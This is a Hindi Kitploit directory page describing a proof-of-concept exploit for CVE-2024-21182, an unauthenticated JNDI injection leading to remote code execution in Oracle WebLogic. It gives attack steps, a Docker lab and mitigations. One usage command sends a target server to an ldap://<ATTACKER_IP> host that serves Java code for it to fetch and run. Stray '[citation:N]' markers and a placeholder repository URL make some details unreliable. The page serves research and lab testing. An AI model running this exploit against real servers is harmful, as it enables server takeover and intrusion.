Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — CVE-2024-21182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Oracle WebLogic Server में T3/IIOP प्रोटोकॉल के माध्यम से एक अनऑथेंटिकेटेड JNDI इंजेक्शन है जो रिमोट कोड एग्जीक्यूशन की ओर ले जाता है। परीक्षण के लिए एक Docker लैब शामिल है। | Kitploit
उपकरण/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

CVE-2024-21182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Oracle WebLogic Server में T3/IIOP प्रोटोकॉल के माध्यम से एक अनऑथेंटिकेटेड JNDI इंजेक्शन है जो रिमोट कोड एग्जीक्यूशन की ओर ले जाता है। परीक्षण के लिए एक Docker लैब शामिल है।

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 CVSS CISA KEV

📋 विवरण

CVE-2024-21182 एक अप्रमाणित JNDI इंजेक्शन भेद्यता है जो Oracle WebLogic Server के Core घटक को प्रभावित करती है। यह एक दूरस्थ हमलावर को T3 या IIOP प्रोटोकॉल के माध्यम से सर्वर पर मनमाना कोड (RCE) निष्पादित करने की अनुमति देती है, जिससे सर्वर के सभी डेटा तक पूर्ण पहुँच प्राप्त की जा सकती है[citation:5][citation:8][citation:9]।

इस भंडार में एक कार्यात्मक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है जो AggregatableOpaqueReference + MessageDestinationReference गैजेट श्रृंखला के माध्यम से CVE-2023-21839 के पैच के सफल शोषण को प्रदर्शित करता है[citation:2][citation:4]।

🚨 भेद्यता का विवरण

विशेषतामान
CVECVE-2024-21182
उत्पादOracle WebLogic Server (Core)
प्रभावित संस्करण12.2.1.4.0 और 14.1.1.0.0[citation:7]
उपलब्ध पैचOracle Critical Patch Update (जुलाई 2024 और अक्टूबर 2024)[citation:6]
CISA KEV में स्थितिसक्रिय शोषण की पुष्टि (01/06/2026 को जोड़ा गया)[citation:3][citation:8]
शमन की अंतिम तिथि (CISA)04/06/2026[citation:8]

हमला वेक्टर

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • नेटवर्क (AV:N): दूरस्थ रूप से शोषण योग्य
  • कम जटिलता (AC:L): कोई विशेष शर्तें नहीं
  • कोई प्रमाणीकरण नहीं (PR:N): अनाम पहुँच
  • उपयोगकर्ता संपर्क नहीं (UI:N): निष्क्रिय शोषण

⚙️ हमले के चरण

चरण 1: पहचान: T3/IIOP पोर्ट (7001) के साथ उजागर WebLogic सर्वरों की पहचान करें।

चरण 2: विश्लेषण: निर्धारित करें कि सर्वर एक कमजोर संस्करण (12.2.1.4.0 या 14.1.1.0.0) चला रहा है या अक्टूबर 2024 के पैच से रहित है।

चरण 3: शोषण (तकनीकी प्रवाह):

  1. गैजेट निर्माण: हमलावर एक AggregatableOpaqueReference ऑब्जेक्ट बनाता है[citation:2]।
  2. रेफरेंस इंजेक्शन: रिफ्लेक्शन (Java) के माध्यम से, पिछले ऑब्जेक्ट के निजी फील्ड referent को संशोधित किया जाता है ताकि वह एक दुर्भावनापूर्ण MessageDestinationReference की ओर इंगित करे[citation:4]।
  3. बाइंड और लुकअप: दुर्भावनापूर्ण ऑब्जेक्ट को सर्वर के JNDI ट्री में "बाइंड" किया जाता है और फिर "लुकअप" किया जाता है।
  4. JNDI रिज़ॉल्यूशन: ऑब्जेक्ट को खोजने पर, सर्वर हमलावर द्वारा नियंत्रित URL (LDAP सर्वर) के विरुद्ध एक नई JNDI क्वेरी निष्पादित करता है।
  5. LDAP सर्वर: हमलावर के HTTP सर्वर पर होस्ट किए गए Java कोड के संदर्भ के साथ प्रतिक्रिया करता है।
  6. कोड निष्पादन: WebLogic सर्वर Java क्लास को डाउनलोड और इंस्टैंशिएट करता है, पीड़ित मशीन के संदर्भ में इसकी सामग्री निष्पादित करता है।

🛠️ पूर्वापेक्षाएँ

  • Docker और Docker Compose: अलग-थलग परीक्षण वातावरण के लिए[citation:2]।
  • JDK 8 या उच्चतर: T3 क्लाइंट को संकलित और चलाने के लिए।
  • WebLogic का T3 क्लाइंट: wlthint3client.jar (WebLogic इंस्टॉलेशन से निकाला जा सकता है)।

🚀 PoC का उपयोग

प्रयोगशाला वातावरण (Docker)

root@kitploit:~
# 1. रिपॉजिटरी क्लोन करें
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182

# 2. प्रयोगशाला शुरू करें (पीड़ित + हमलावर)
docker-compose up -d

# 3. स्वचालित शोषण चलाएँ
./validate.sh

अधिकृत लक्ष्य के विरुद्ध शोषण

root@kitploit:~
# 1. दुर्भावनापूर्ण LDAP/HTTP सर्वर शुरू करें
python3 exploit/ldap_server.py

# 2. दूसरे टर्मिनल में, Java पेलोड निष्पादित करें
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

📊 प्रदर्शित प्रभाव

  • सर्वर पर रिमोट कमांड निष्पादन (RCE)
  • एप्लिकेशन के महत्वपूर्ण डेटा तक अनधिकृत पहुँच
  • एप्लिकेशन सर्वर का पूर्ण समझौता
  • कॉर्पोरेट नेटवर्क में पार्श्व आंदोलन के लिए संभावित प्रवेश द्वार
  • रैनसमवेयर या अन्य दुर्भावनापूर्ण पेलोड तैनाती का आधार

CISA के अनुसार वर्तमान स्थिति: "Known To Be Used in Ransomware Campaigns? Unknown" (लेकिन आमतौर पर हाँ, मिडलवेयर में RCE रैनसमवेयर घुसपैठ में प्रारंभिक वेक्टर होता है)।

🛡️ शमन

  • तुरंत पैच करें: Oracle का अक्टूबर 2024 या बाद का Critical Patch Update लागू करें।
  • नेटवर्क प्रतिबंध: T3/IIOP पोर्ट्स (जैसे 7001) तक पहुँच को केवल विश्वसनीय स्रोतों तक सीमित/अवरुद्ध करें।
  • निगरानी: JNDI ट्री में असामान्य बाइंड/लुकअप प्रयासों का पता लगाएँ।

⚠️ कानूनी चेतावनी

यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। स्पष्ट प्राधिकरण के बिना सिस्टम के विरुद्ध इस PoC का दुरुपयोग अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है।

📚 संदर्भ

  • NVD - CVE-2024-21182
  • CISA KEV Catalog
  • Oracle Security Advisory
  • मूल तकनीकी विश्लेषण

🤝 श्रेय

  • मूल शोधकर्ता जिसने गैजेट श्रृंखला की खोज की
  • डॉकर में प्रतिलिपि प्रयोगशाला के लिए dinosn
टूल डाउनलोड करें